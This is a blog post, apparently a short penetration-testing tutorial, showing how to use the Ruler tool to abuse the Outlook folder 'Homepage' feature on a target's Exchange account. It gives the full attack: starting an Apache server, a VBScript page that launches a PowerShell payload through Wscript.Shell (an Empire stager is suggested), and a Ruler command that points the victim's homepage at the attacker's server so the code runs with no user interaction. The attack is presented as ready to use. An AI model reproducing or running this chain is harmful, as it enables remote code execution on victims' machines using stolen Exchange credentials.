Hack Outlook with ZERO user interaction

GDPR Notice – Please accept YouTube cookies to play this video. By accepting you will be accessing content from YouTube, a service provided by an external third party.

YouTube privacy policy

If you accept this notice, your choice will be saved and the page will refresh.

There’s definitely something more appealing about a hack that doesn’t require user interaction.. It just makes everything feel a bit more like its going to work.

I was shown and stumbled across a tool called Ruler, which allows you to interact with the Exchange/Outlook Web Access API in order to manipulate things within the desktop Outlook client which syncs with the Exchange server. You can do this by way of an inbox rule, where a specific application is execute when an email containing a set subject is received. The option which I opted for was the ‘Homepage’ functionality. The homepage can be displayed at the top of a folder on Outlook, in regular usage.. But this browser is IE, which runs all client side code with a higher trust level than the regular Internet Explorer you may have installed. As a result; Wscript, which would ordinarily require a user to accept a warning in order to execute the code, can be executed.

So first let’s set up our ‘payload’

The homepage is of course a web page, so we’re going to need to set up a web server. Luckily Kali comes with Apache2 preinstalled so we can just run:

service apache2 start

We then need to edit the index.html file which is located at /var/www/html/index.html and replace it with the code seen below:

<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script id=clientEventHandlersVBS language=vbscript>
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("<insert your own powershell payload>")
 End Sub


 <h1> Hello Alex </h1>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>

In the code above, replace the text text to cmd.Run(” with a powershell payload of your choice. I am using an Empire stager, but you can use anything you want. Once you have edited the file accordingly, save it and exit that file. With our payload set up, we can now install the new homepage using Ruler.

Setting a new homepage with Ruler

We can now use Ruler to set the homepage to the web page we have just created:

./ruler --username "bbrown" --password "Password1" --email "[email protected]" homepage add --url ""

The command above will need to be edited with information of your target, and the server hosting your payload. When the user refreshes their Inbox, by restarting Outlook or simply switching folders, the web page will be loaded and your code will be executed. Woooo!

This is super cool and a massive thanks to the guys over at Sensepost for creating and maintaining Ruler!

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: